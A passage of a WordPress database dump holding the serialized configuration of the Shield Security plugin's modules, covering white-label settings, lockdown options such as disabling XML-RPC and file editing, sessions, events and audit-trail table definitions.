deletion.\";}i:9;a:10:{s:3:\"key\";s:27:\"admin_access_restrict_posts\";s:7:\"section\";s:38:\"section_admin_access_restriction_areas\";s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"edit\";s:4:\"text\";s:11:\"Create/Edit\";}i:1;a:2:{s:9:\"value_key\";s:7:\"publish\";s:4:\"text\";s:7:\"Publish\";}i:2;a:2:{s:9:\"value_key\";s:6:\"delete\";s:4:\"text\";s:6:\"Delete\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a0\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf21\";s:7:\"summary\";s:56:\"Restrict Access To Key WordPress Posts And Pages Actions\";s:11:\"description\";s:79:\"Careful: This will restrict access to page/post creation, editing and deletion.\";}i:10;a:10:{s:3:\"key\";s:17:\"whitelabel_enable\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/dr\";s:9:\"link_blog\";s:19:\"https://shsec.io/ds\";s:4:\"name\";s:18:\"Enable White Label\";s:7:\"summary\";s:34:\"Activate Your White Label Settings\";s:11:\"description\";s:61:\"Use this option to turn on/off the whole White Label feature.\";}i:11;a:9:{s:3:\"key\";s:15:\"wl_hide_updates\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Hide Updates\";s:7:\"summary\";s:47:\"Hide Available Updates From Non Security Admins\";s:11:\"description\";s:66:\"Hides the availability of Shield updates from non-security admins.\";}i:12;a:9:{s:3:\"key\";s:20:\"wl_replace_badge_url\";s:7:\"section\";s:18:\"section_whitelabel\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Replace Plugin Badge\";s:7:\"summary\";s:35:\"Replace Plugin Badge URL and Images\";s:11:\"description\";s:84:\"When using the plugin badge, replace the URL and link with your Whitelabel settings.\";}i:13;a:10:{s:3:\"key\";s:17:\"wl_pluginnamemain\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:6:\"Shield\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Plugin Name\";s:7:\"summary\";s:22:\"The Name Of The Plugin\";s:11:\"description\";s:23:\"The Name Of The Plugin.\";}i:14;a:10:{s:3:\"key\";s:11:\"wl_namemenu\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:15:\"Shield Security\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Menu Title\";s:7:\"summary\";s:33:\"The Main Menu Title Of The Plugin\";s:11:\"description\";s:79:\"The Main Menu Title Of The Plugin. If left empty, the Plugin Name will be used.\";}i:15;a:10:{s:3:\"key\";s:14:\"wl_companyname\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"Example Company Name\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Company Name\";s:7:\"summary\";s:24:\"The Name Of Your Company\";s:11:\"description\";s:33:\"Provide the name of your company.\";}i:16;a:10:{s:3:\"key\";s:14:\"wl_description\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:74:\"Secure Your Sites With The World\'s Most Powerful WordPress Security Plugin\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Plugin Tag Line\";s:7:\"summary\";s:26:\"The Tag Line Of The Plugin\";s:11:\"description\";s:27:\"The Tag Line Of The Plugin.\";}i:17;a:10:{s:3:\"key\";s:10:\"wl_homeurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:19:\"https://shsec.io/7f\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"Home URL\";s:7:\"summary\";s:20:\"Plugin Home Page URL\";s:11:\"description\";s:84:\"When a user clicks the home link for this plugin, this is where they\'ll be directed.\";}i:18;a:10:{s:3:\"key\";s:14:\"wl_menuiconurl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:20:\"pluginlogo_16x16.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:9:\"Menu Icon\";s:7:\"summary\";s:13:\"Menu Icon URL\";s:11:\"description\";s:42:\"The URL of the icon displayed in the menu.\";}i:19;a:10:{s:3:\"key\";s:19:\"wl_dashboardlogourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:22:\"pluginlogo_128x128.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}i:20;a:10:{s:3:\"key\";s:19:\"wl_login2fa_logourl\";s:7:\"section\";s:18:\"section_whitelabel\";s:9:\"sensitive\";b:1;s:7:\"default\";s:29:\"pluginlogo_banner-772x250.png\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/dt\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Dashboard Logo\";s:7:\"summary\";s:18:\"Dashboard Logo URL\";s:11:\"description\";s:72:\"The URL of the logo displayed in the main dashboard. Should be 128x128px\";}}s:11:\"definitions\";a:3:{s:22:\"restricted_pages_users\";a:2:{i:0;s:13:\"user-edit.php\";i:1;s:9:\"users.php\";}s:6:\"events\";a:2:{s:11:\"key_success\";a:1:{s:6:\"recent\";b:1;}s:8:\"key_fail\";a:3:{s:3:\"cat\";i:3;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}s:19:\"options_to_restrict\";a:4:{s:12:\"wpms_options\";a:3:{i:0;s:11:\"admin_email\";i:1;s:9:\"site_name\";i:2;s:12:\"registration\";}s:10:\"wpms_pages\";a:1:{i:0;s:12:\"settings.php\";}s:10:\"wp_options\";a:10:{i:0;s:8:\"blogname\";i:1;s:15:\"blogdescription\";i:2;s:7:\"siteurl\";i:3;s:4:\"home\";i:4;s:11:\"admin_email\";i:5;s:15:\"new_admin_email\";i:6;s:18:\"users_can_register\";i:7;s:15:\"comments_notify\";i:8;s:18:\"comment_moderation\";i:9;s:11:\"blog_public\";}s:8:\"wp_pages\";a:4:{i:0;s:19:\"options-general.php\";i:1;s:22:\"options-discussion.php\";i:2;s:19:\"options-reading.php\";i:3;s:11:\"options.php\";}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420386,'shield_mod_config_06adfe4b6eee2940cee149d020360f7a','a:6:{s:4:\"slug\";s:8:\"lockdown\";s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"lockdown\";s:4:\"name\";s:11:\"WP Lockdown\";s:12:\"sidebar_name\";s:8:\"Lockdown\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"lockdown\";s:7:\"tagline\";s:56:\"Harden the more loosely controlled settings of your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:90;}s:8:\"sections\";a:5:{i:0;a:5:{s:4:\"slug\";s:14:\"section_apixml\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"WordPress System Lockdown\";s:11:\"title_short\";s:6:\"System\";s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Lockdown certain core WordPress system features.\";i:1;s:99:\"Recommendation - This depends on your usage and needs for certain WordPress functions and features.\";}}i:1;a:4:{s:4:\"slug\";s:33:\"section_permission_access_options\";s:5:\"title\";s:30:\"Permissions and Access Options\";s:11:\"title_short\";s:11:\"Permissions\";s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Provides finer control of certain WordPress permissions.\";i:1;s:75:\"Recommendation - Only enable SSL if you have a valid certificate installed.\";}}i:2;a:4:{s:4:\"slug\";s:35:\"section_wordpress_obscurity_options\";s:5:\"title\";s:27:\"WordPress Obscurity Options\";s:11:\"title_short\";s:9:\"Obscurity\";s:7:\"summary\";a:2:{i:0;s:63:\"Purpose - Obscures certain WordPress settings from public view.\";i:1;s:103:\"Recommendation - Obscurity is not true security and so these settings are down to your personal tastes.\";}}i:3;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:5:\"title\";s:23:\"Enable Module: Lockdown\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Lockdown helps secure-up certain loosely-controlled WordPress settings on your site.\";i:1;s:53:\"Recommendation - Keep the Lockdown feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:10:{s:3:\"key\";s:15:\"enable_lockdown\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4r\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Lockdown\";s:7:\"summary\";s:39:\"Enable (or Disable) The Lockdown module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Lockdown module\";}i:1;a:9:{s:3:\"key\";s:14:\"disable_xmlrpc\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e6\";s:9:\"link_blog\";s:19:\"https://shsec.io/fb\";s:4:\"name\";s:15:\"Disable XML-RPC\";s:7:\"summary\";s:26:\"Disable The XML-RPC System\";s:11:\"description\";s:71:\"Checking this option will completely turn off the whole XML-RPC system.\";}i:2;a:10:{s:3:\"key\";s:25:\"disable_anonymous_restapi\";s:7:\"section\";s:14:\"section_apixml\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Anonymous Rest API\";s:7:\"summary\";s:30:\"Disable The Anonymous Rest API\";s:11:\"description\";s:82:\"Checking this option will completely turn off the whole Anonymous Rest API system.\";}i:3;a:9:{s:3:\"key\";s:24:\"api_namespace_exclusions\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:11:\"woocommerce\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Rest API Exclusions\";s:7:\"summary\";s:29:\"Anonymous REST API Exclusions\";s:11:\"description\";s:81:\"Any namespaces provided here will be excluded from the Anonymous API restriction.\";}i:4;a:9:{s:3:\"key\";s:20:\"disable_file_editing\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4q\";s:9:\"link_blog\";s:19:\"https://shsec.io/hk\";s:4:\"name\";s:20:\"Disable File Editing\";s:7:\"summary\";s:51:\"Disable Ability To Edit Files From Within WordPress\";s:11:\"description\";s:135:\"Removes the option to directly edit any files from within the WordPress admin area. Equivalent to setting \'DISALLOW_FILE_EDIT\' to TRUE.\";}i:5;a:9:{s:3:\"key\";s:15:\"force_ssl_admin\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4t\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Force SSL Admin\";s:7:\"summary\";s:57:\"Forces WordPress Admin Dashboard To Be Delivered Over SSL\";s:11:\"description\";s:126:\"Please only enable this option if you have a valid SSL certificate installed. Equivalent to setting \'FORCE_SSL_ADMIN\' to TRUE.\";}i:6;a:9:{s:3:\"key\";s:22:\"block_author_discovery\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf23\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Block Username Fishing\";s:7:\"summary\";s:69:\"Block the ability to discover WordPress usernames based on author IDs\";s:11:\"description\";s:150:\"When enabled, any URL requests containing \'author=\' will be killed. Warning: Enabling this option may interfere with expected operations of your site.\";}i:7;a:9:{s:3:\"key\";s:16:\"clean_wp_rubbish\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Clean WP Files\";s:7:\"summary\";s:41:\"Automatically Delete Unnecessary WP Files\";s:11:\"description\";s:63:\"Automatically delete WordPress files like wp-config-sample.php.\";}i:8;a:9:{s:3:\"key\";s:28:\"hide_wordpress_generator_tag\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"WP Generator Tag\";s:7:\"summary\";s:28:\"Remove WP Generator Meta Tag\";s:11:\"description\";s:119:\"Remove a meta tag from your WordPress pages that publicly displays that your site is WordPress and its current version.\";}}s:11:\"definitions\";a:2:{s:26:\"default_restapi_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}s:6:\"events\";a:2:{s:23:\"block_anonymous_restapi\";a:1:{s:6:\"recent\";b:1;}s:9:\"block_xml\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420387,'shield_mod_config_a11ed43e6f8c0c73b544f95d54fec314','a:6:{s:10:\"properties\";a:12:{s:4:\"slug\";s:6:\"events\";s:4:\"name\";s:6:\"Events\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:6:\"events\";s:7:\"tagline\";s:37:\"Collection of plugin events and stats\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:36:\"section_enable_plugin_feature_events\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Module: Events\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:51:\"Recommendation - Keep the Events feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:13:\"enable_events\";s:7:\"section\";s:36:\"section_enable_plugin_feature_events\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable Events\";s:7:\"summary\";s:37:\"Enable (or Disable) The Events module\";s:11:\"description\";s:65:\"Un-Checking this option will completely disable the Events module\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:6:\"events\";s:65:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Events\\Handler\";}s:17:\"events_table_name\";s:6:\"events\";s:20:\"events_table_columns\";a:2:{s:5:\"event\";s:54:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Event ID\'\";s:5:\"count\";s:51:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total\'\";}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420388,'shield_mod_config_70e5d30ddb850aafaee6dc5037afaf3f','a:6:{s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"sessions\";s:4:\"name\";s:8:\"Sessions\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:8:\"sessions\";s:7:\"tagline\";s:13:\"User Sessions\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:19:\"auto_load_processor\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Enable Module: Sessions\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:44:\"Purpose - Creates and Manages User Sessions.\";i:1;s:53:\"Recommendation - Keep the Sessions feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:2:{i:0;a:9:{s:3:\"key\";s:15:\"enable_sessions\";s:7:\"section\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Sessions\";s:7:\"summary\";s:39:\"Enable (or Disable) The Sessions module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Sessions module\";}i:1;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:5:{s:10:\"db_classes\";a:1:{s:7:\"session\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Session\\Handler\";}s:19:\"sessions_table_name\";s:8:\"sessions\";s:22:\"sessions_table_columns\";a:5:{s:10:\"session_id\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:11:\"wp_username\";s:32:\"varchar(255) NOT NULL DEFAULT \'\'\";s:2:\"ip\";s:32:\"varchar(60) NOT NULL DEFAULT \'0\'\";s:7:\"browser\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:17:\"last_activity_uri\";s:24:\"text NOT NULL DEFAULT \'\'\";}s:32:\"sessions_table_timestamp_columns\";a:4:{s:12:\"logged_in_at\";s:15:\"Session Started\";s:16:\"last_activity_at\";s:12:\"Last Seen At\";s:23:\"login_intent_expires_at\";s:18:\"2FA Window Expires\";s:11:\"secadmin_at\";s:28:\"Security Admin Authenticated\";}s:6:\"events\";a:2:{s:13:\"session_start\";a:1:{s:5:\"audit\";b:0;}s:17:\"session_terminate\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1611420210;}','yes'),(420389,'shield_mod_config_cb9d9aea63f985b43df6919c165acb26','a:8:{s:4:\"slug\";s:11:\"audit_trail\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"audit_trail\";s:4:\"name\";s:11:\"Audit Trail\";s:12:\"sidebar_name\";s:11:\"Audit Trail\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"audit_trail\";s:7:\"tagline\";s:50:\"Track All Site Activity: Who, What, When and Where\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:11:\"Audit Trail\";s:4:\"slug\";s:14:\"audit-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"audit-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:5:\"audit\";}}}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:27:\"section_audit_trail_options\";s:7:\"primary\";b:1;s:5:\"title\";s:19:\"Audit Trail Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:5:{s:4:\"slug\";s:23:\"section_change_tracking\";s:6:\"hidden\";b:1;s:5:\"title\";s:15:\"Change Tracking\";s:11:\"title_short\";s:15:\"Change Tracking\";s:7:\"summary\";a:2:{i:0;s:49:\"Purpose - Track significant changes to your site.\";i:1;s:55:\"Recommendation - Keep this Reporting feature turned on.\";}}i:2;a:4:{s:4:\"slug\";s:41:\"section_enable_plugin_feature_audit_trail\";s:5:\"title\";s:26:\"Enable Module: Audit Trail\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:124:\"Purpose - The Audit Trail is designed so you can look back on events and analyse what happened and what may have gone wrong.\";i:1;s:56:\"Recommendation - Keep the Audit Trail feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:7:{i:0;a:10:{s:3:\"key\";s:18:\"enable_audit_trail\";s:7:\"section\";s:41:\"section_enable_plugin_feature_audit_trail\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5p\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:18:\"Enable Audit Trail\";s:7:\"summary\";s:42:\"Enable (or Disable) The Audit Trail module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Audit Trail module\";}i:1;a:10:{s:3:\"key\";s:22:\"audit_trail_auto_clean\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"default\";i:14;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/a2\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:10:\"Auto Clean\";s:7:\"summary\";s:26:\"Enable Audit Auto Cleaning\";s:11:\"description\";s:94:\"Events older than the number of days specified will be automatically cleaned from the database\";}i:2;a:11:{s:3:\"key\";s:23:\"audit_trail_max_entries\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/hc\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Max Trail Length\";s:7:\"summary\";s:34:\"Maximum Audit Trail Length To Keep\";s:11:\"description\";s:73:\"Automatically remove any audit trail entries when this limit is exceeded.\";}i:3;a:10:{s:3:\"key\";s:22:\"enable_change_tracking\";s:7:\"section\";s:23:\"section_change_tracking\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:7:\"Enabled\";}i:2;a:2:{s:9:\"value_key\";s:18:\"enabled_with_email\";s:4:\"text\";s:26:\"Enabled With Email Reports\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable Change Tracking\";s:7:\"summary\";s:32:\"Track Major Changes To Your Site\";s:11:\"description\";s:85:\"Tracking major changes to your site will help you monitor and catch malicious damage.\";}i:4;a:10:{s:3:\"key\";s:21:\"ct_snapshots_per_week\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:7;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:5;a:10:{s:3:\"key\";s:16:\"ct_max_snapshots\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:28;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:6;a:5:{s:3:\"key\";s:19:\"ct_last_snapshot_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}}s:11:\"definitions\";a:8:{s:10:\"db_classes\";a:1:{s:5:\"audit\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AuditTrail\\Handler\";}s:28:\"audit_trail_free_max_entries\";i:100;s:22:\"audit_trail_table_name\";s:11:\"audit_trail\";s:25:\"audit_trail_table_columns\";a:10:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:2:\"ip\";s:59:\"varchar(40) NOT NULL DEFAULT 0 COMMENT \'Visitor IP Address\'\";s:11:\"wp_username\";s:51:\"varchar(255) NOT NULL DEFAULT \'-\' COMMENT \'WP User\'\";s:7:\"context\";s:59:\"varchar(32) NOT NULL DEFAULT \'none\' COMMENT \'Audit Context\'\";s:5:\"event\";s:66:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Specific Audit Event\'\";s:8:\"category\";s:53:\"int(3) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Severity\'\";s:7:\"message\";s:38:\"text COMMENT \'Audit Event Description\'\";s:4:\"meta\";s:31:\"text COMMENT \'Audit Event Data\'\";s:9:\"immutable\";s:63:\"tinyint(1) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'May Be Deleted\'\";s:5:\"count\";s:62:\"SMALLINT(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT \'Repeat Count\'\";}s:34:\"audittrail_table_timestamp_columns\";a:1:{s:10:\"updated_at\";s:7:\"Updated\";}s:25:\"table_name_changetracking\";s:14:\"changetracking\";s:28:\"table_columns_changetracking\";a:5:{i:0;s:2:\"id\";i:1;s:4:\"data\";i:2;s:4:\"meta\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:6:\"events\";a:22:{s:16:\"plugin_activated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_deactivated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_file_edited\";a:1:{s:7:\"context\";s:7:\"plugins\";}s:15:\"plugin_upgraded\";a:1:{s:7:\"context\";s:7:\"plugins\";}s:15:\"theme_activated\";a:1:{s:7:\"context\";s:6:\"themes\";}s:17:\"theme_file_edited\";a:1:{s:7:\"context\";s:6:\"themes\";}s:14:\"theme_upgraded\";a:1:{s:7:\"context\";s:6:\"themes\";}s:12:\"core_updated\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:20:\"permalinks_structure\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:12:\"post_deleted\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_trashed\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_recovered\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_updated\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_published\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:16:\"post_unpublished\";a:2:{s:7:\"context\";s:5:\"posts\";s: